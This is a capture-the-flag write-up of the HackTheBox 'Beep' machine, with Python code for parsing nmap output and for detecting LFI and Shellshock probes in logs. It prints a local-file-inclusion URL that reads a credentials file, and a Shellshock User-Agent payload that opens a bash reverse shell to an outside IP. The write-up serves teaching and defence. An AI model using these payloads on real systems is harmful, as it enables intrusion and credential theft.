Beep Writeup

Without Metasploit

Reconnaissance

Initial Nmap scan to find open ports, treating all hosts as online (-Pn):

nmap -Pn 10.10.10.7

Detailed Nmap scan:

Command Breakdown:

  • (-sV): Service version detection

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 22,25,80,110,111,143,443,993,995,3306,4445,10000

  • (-oN nmap): Saving the output to a file called nmap

nmap -sV -sC -p 22,25,80,110,111,143,443,993,995,3306,4445,10000 -oN nmap 10.10.10.7

To make sure we are not missing any ports, let's also run an Nmap scan that covers all 65535 ports (-p-):

nmap -sC -sV -p- -oN nmap_AllPorts 10.10.10.7

Ports

  • Port 22: OpenSSH 4.3 (protocol 2.0)

  • Port 25: smtp (Postfix smtpd)

  • Port 80: http (Apache httpd 2.2.3)

  • Port 110: pop3 (Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4)

  • Port 111: rpcbind

  • Port 143: imap (Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4)

  • Port 443: ssl / https

  • Port 878: status

  • Port 993: ssl / imap (Cyrus imapd)

  • Port 995: pop3 (Cyrus pop3d)

  • Port 3306: MySQL

  • Port 4190: Sieve (Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap))

  • Port 4445: Upnotifyp

  • Port 4559: hylafax (HylaFAX 4.3.10)

  • Port 5038: asterisk (Asterisk Call Manager 1.1)

  • Port 10000: http Miniserv 1.570 (Webmin httpd)

Notes

  • Port 22 is running an old OpenSSH version (4.3) with known exploits.

  • Ports 25, 110, 143 and 995 are running mail servers.

  • Port 111 is running rpcbind, a service that maps RPC program numbers to ports for other RPC services such as NFS and mountd.

  • Ports 80, 443 and 10000 are running web servers.

  • Port 3306 is running a MySQL database.

  • Port 4445 is running Upnotifyp, which is an online TCP/UDP port finder.

  • Port 4559 is running HylaFAX 4.3.10, an open source fax server that allows fax equipment to be shared among computers.

  • Port 5038 is running Asterisk Call Manager 1.1.
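Since the writeup reads the open ports off the scan by hand, here is an added example (not part of the original writeup) of doing it programmatically: a small Python parser for the normal (-oN) output these commands produce, run over a constructed sample rebuilt from the port table above. It then diffs the open ports against a hypothetical expected-exposure baseline (EXPECTED_PORTS is an assumption, not something from the box) and lists the ports nmap could not fingerprint, which are the ones a version-based check has nothing to say about.

```python
import re
from dataclasses import dataclass

# Constructed sample of nmap "normal" (-oN) output. It is rebuilt from the port
# table in this writeup and is not a real capture of the box.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.7
Host is up (0.045s latency).
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
25/tcp    open  smtp       Postfix smtpd
80/tcp    open  http       Apache httpd 2.2.3
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp   open  rpcbind
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443/tcp   open  ssl/https?
993/tcp   open  ssl/imap   Cyrus imapd
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql?
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Login to Webmin
"""

# Hypothetical baseline: the ports this host is expected to expose on the network.
EXPECTED_PORTS = {22, 80, 443}


@dataclass
class OpenPort:
    port: int
    proto: str
    service: str
    version: str  # empty string when nmap printed no VERSION column


# One "port/proto state service [version]" line of the -oN table
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*\S))?\s*$"
)


def parse_nmap_normal(text):
    """Return the open ports listed in nmap -oN output.

    Script output (lines starting with '|' or '|_'), the host header and the
    column header do not match PORT_LINE and are skipped.
    """
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if not m or m.group("state") != "open":
            continue
        ports.append(OpenPort(int(m.group("port")), m.group("proto"),
                              m.group("service"), m.group("version") or ""))
    return ports


def unexpected_ports(ports, expected):
    """Open ports outside the baseline: each is a service to justify or firewall off."""
    return sorted(p.port for p in ports if p.port not in expected)


def unfingerprinted(ports):
    """Ports whose service nmap could not confirm (trailing '?') or that carry
    no version string, so they need a manual look rather than a version lookup."""
    return sorted(p.port for p in ports
                  if p.service.endswith("?") or not p.version)


def exposure_report(text, expected=EXPECTED_PORTS):
    ports = parse_nmap_normal(text)
    return {
        "open": [p.port for p in ports],
        "unexpected": unexpected_ports(ports, expected),
        "unfingerprinted": unfingerprinted(ports),
    }


if __name__ == "__main__":
    for key, value in exposure_report(SAMPLE_NMAP_OUTPUT).items():
        print(f"{key}: {value}")
```

Point the same parser at a real nmap_AllPorts file and at a second scan taken later, and the "unexpected" list becomes a cheap drift check for services that appeared on a host since it was last reviewed.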

Enumeration

Port 443

Let's visit the application.

It's running a software called Elastix, a unified communications server that brings together IP PBX, email and other functionality. We do not get any other information, so let's run gobuster to find hidden directories. Since the site runs on HTTPS with a self-signed certificate, we skip certificate verification with the (-k) flag.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.7 -k

Looking through the directories, we find the FreePBX version, which is 2.8.1.4, but nothing on Elastix, so let's search for exploits with searchsploit:

searchsploit elastix

We find a few exploits. The cross-site scripting ones won't work here, as XSS is a client-side attack that needs user interaction. We can use the LFI and remote code execution exploits instead.

Port 10000

Let's visit the application.

It looks like a login page, and it also tells us what it is running, which is Webmin. Let's go to searchsploit and look for vulnerabilities in it:

searchsploit webmin

There are a lot of exploits. Looking through them, we see something in common: CGI, which is what we exploited in the Shocker box on HackTheBox. The exploit we used there is called Shellshock, so let's try it here.

Exploitation

Port 443

We are going to use the LFI vulnerability to get root privileges on this system, so let's copy the exploit to our working directory:

searchsploit -m php/webapps/37637.pl

Reading through the exploit, we can see that the LFI vulnerability is in the current_language parameter of graph.php.

So let's try it:

https://10.10.10.7//vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

This returns a lot of information. Looking at the page source, we find something interesting: a set of credentials.

Let's try to SSH into the machine using these credentials:

ssh admin@10.10.10.7

I got this error, which is something that I had seen before, and I think it is not related to false information, so I went to Google, searched for this error and found an article telling us how to solve this issue. After using it I tried logging in, but it said it was the wrong password, so I tried a different username (root) and it worked.

Port 10000

Let's use the Shellshock vulnerability. First we have to capture the request to the web application using Burp Suite and change the User-Agent header to the following:

() { :;}; bash -i >& /dev/tcp/10.10.14.19/1234 0>&1

This will give us a reverse shell, so let's start a listener first:

nc -lvnp 1234

Now let's run the exploit in Burp Suite. If you want the steps, go to my Shocker writeup; I did not use Burp there, but you will be guided up to this step, and then you can change the User-Agent header and send the request.

After clicking send, you should get a reverse shell.
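Both attacks in this section leave a distinctive trace in the web server's access log: the LFI request carries a "../" traversal with a %00 null byte in the current_language parameter, and the Shellshock request carries a User-Agent that starts with a bash function definition, "() {". As an added example (not part of the original writeup), here is a Python detector for both patterns run over constructed Apache combined-format log lines; the sample lines, the IPs and the timestamps are made up for the example, and the double-encoded line goes beyond what the writeup shows, to cover the %252e evasion a plain string match would miss.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample log lines in Apache "combined" format. Line 1 mirrors the
# LFI request from this writeup, line 2 is a benign request to the same script,
# line 3 carries a Shellshock-style User-Agent and line 4 is a double-encoded
# traversal. None of these are real captures from the box.
SAMPLE_LOG = """\
10.10.14.19 - - [10/Oct/2020:12:00:01 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.10.14.19 - - [10/Oct/2020:12:00:02 +0000] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.10.14.19 - - [10/Oct/2020:12:00:03 +0000] "GET /cgi-bin/status HTTP/1.1" 200 0 "-" "() { :;}; echo shellshock-probe"
10.10.14.19 - - [10/Oct/2020:12:00:04 +0000] "GET /index.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1 "-" "Mozilla/5.0"
"""

# Quoted log fields may contain backslash-escaped quotes
QUOTED = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>' + QUOTED + r')" "(?P<ua>' + QUOTED + r')"$'
)

# A ".." path segment with either slash style, anywhere in a decoded value
TRAVERSAL = re.compile(r'(^|[\\/])\.\.([\\/]|$)')
# A header value that opens with a bash function definition, "() {"
SHELLSHOCK = re.compile(r'^\s*\(\)\s*\{')
# Reads of system configuration files are the usual goal of an LFI
SENSITIVE = re.compile(r'/etc/')


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decode_twice(s):
    # Decode twice so a doubly-encoded "%252e%252e" is still seen as ".."
    return unquote(unquote(s))


def decoded_request_values(target):
    """Yield the decoded path and every decoded query value of a request target."""
    parts = urlsplit(target)
    yield decode_twice(parts.path)
    for pair in parts.query.split("&"):
        if pair:
            _key, _, value = pair.partition("=")
            yield decode_twice(value)


def findings_for(entry):
    """Sorted list of detections for one parsed line ([] when clean)."""
    findings = set()
    for value in decoded_request_values(entry["target"]):
        if "\x00" in value:
            findings.add("null-byte")
        if TRAVERSAL.search(value):
            findings.add("path-traversal")
        if SENSITIVE.search(value):
            findings.add("sensitive-path")
    # The header check applies to any log that records header values, not only Apache
    for header in (entry["ua"], entry["referer"]):
        if SHELLSHOCK.match(header):
            findings.add("shellshock-header")
    return sorted(findings)


def scan_log(text):
    """(client ip, request target, findings) for every flagged line in the log."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        entry = parse_line(line)
        if entry is None:
            hits.append(("?", line[:60], ["unparsed"]))
            continue
        findings = findings_for(entry)
        if findings:
            hits.append((entry["ip"], entry["target"], findings))
    return hits


if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target, ", ".join(findings))
```

For the LFI, the other half of the fix lives in the application: the current_language value should be matched against the list of installed language codes before it is used in a file path, so no traversal or null byte can reach the filesystem call at all. Shellshock is a patch issue rather than an input-validation one; the header signature above is useful for spotting probes, but the fix is an updated bash on the server.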
